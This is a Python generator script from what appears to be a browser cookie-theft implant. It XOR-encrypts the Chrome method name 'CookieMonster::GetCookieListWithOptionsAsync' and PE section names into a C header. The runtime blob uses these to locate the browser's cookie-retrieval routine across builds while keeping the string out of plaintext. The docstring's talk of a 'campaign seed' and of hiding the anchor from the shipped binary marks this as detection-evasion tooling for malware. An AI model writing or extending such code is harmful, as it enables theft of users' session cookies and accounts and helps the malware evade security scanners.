#!/usr/bin/env python3
"""gen_needles.py — emit the encrypted runtime-discovery needles.

The blob's cross-build scanner needs one byte anchor (the
GetCookieListWithOptionsAsync method-name string) that must NOT appear in
plaintext anywhere in the shipped blob.  This generator encrypts it with
the same chained-XOR used for the adapter tables (key evolves
key = key + c + i mod 256) and emits include/pic_needles.h; the runtime
decrypts it into a stack buffer (adapter_chained_xor in src/adapter.c).

Key derivation: (djb_seed >> 3) & 0xFF from scripts/hash_seed — a
different stream from the adapter key ((fnv_seed >> 3) & 0xFF).

Run after changing needles or the campaign seed:

    python3 scripts/gen_needles.py
"""

import json
import pathlib

ROOT = pathlib.Path(__file__).resolve().parent.parent

NEEDLES = {
    # method-name string, unique per build, verified on 8 builds
    # (docs/adapter-field-154.0.8037.md): exactly one occurrence in
    # .rdata and exactly one lea xref per build, 152 -> 154.
    "GETCOOKIELIST": b"CookieMonster::GetCookieListWithOptionsAsync\x00",
    # PE section names used by the discovery scanner (exact 8-byte match,
    # no NUL terminator inside the 8 bytes)
    "SECTEXT": b".text\x00\x00\x00",
    "SECRDATA": b".rdata\x00\x00",
}

BUF = 64  # padded buffer size emitted per needle


def chained_xor(data: bytes, key: int) -> bytes:
    out = bytearray()
    for i, b in enumerate(data):
        c = b ^ key
        out.append(c)
        key = (key + c + i) & 0xFF
    return bytes(out)


def main() -> int:
    cfg = json.loads((ROOT / "scripts/hash_seed").read_text())
    djb = int(cfg["djb_seed"], 16)
    key = (djb >> 3) & 0xFF
    campaign = cfg.get("campaign", "?")

    lines = [
        "/* generated by scripts/gen_needles.py — campaign " + campaign,
        " * do not edit; regenerate after changing needles or hash_seed.",
        " * chained-XOR, key = (djb_seed >> 3) & 0xFF; runtime decrypt in",
        " * src/adapter.c (adapter_chained_xor). */",
        "#ifndef MARGARET_PIC_NEEDLES_H",
        "#define MARGARET_PIC_NEEDLES_H",
        "",
        '#include "pic_resolve.h"',
        "",
        f"#define MARGARET_NEEDLE_XOR_KEY 0x{key:02X}u",
        f"#define MARGARET_NEEDLE_BUF {BUF}u",
        "",
    ]
    for name, plain in NEEDLES.items():
        if len(plain) > BUF:
            raise SystemExit(f"needle {name} exceeds buffer")
        enc = chained_xor(plain.ljust(BUF, b"\x00"), key)
        lines.append(f"#define MARGARET_NEEDLE_{name}_LEN {len(plain)}u")
        lines.append(
            f"static const pic_u8 PIC_RODATA margaret_needle_{name.lower()}"
            f"[MARGARET_NEEDLE_BUF] = {{"
        )
        for i in range(0, BUF, 16):
            chunk = enc[i : i + 16]
            lines.append("    " + ", ".join(f"0x{b:02X}u" for b in chunk) + ",")
        lines.append("};")
        lines.append("")
    lines.append("#endif /* MARGARET_PIC_NEEDLES_H */")
    lines.append("")

    out = ROOT / "include/pic_needles.h"
    out.write_text("\n".join(lines))
    print(f"[needles] key=0x{key:02X} -> {out}")
    for name, plain in NEEDLES.items():
        print(f"[needles] {name}: {len(plain)} byte")
    return 0


if __name__ == "__main__":
    raise SystemExit(main())
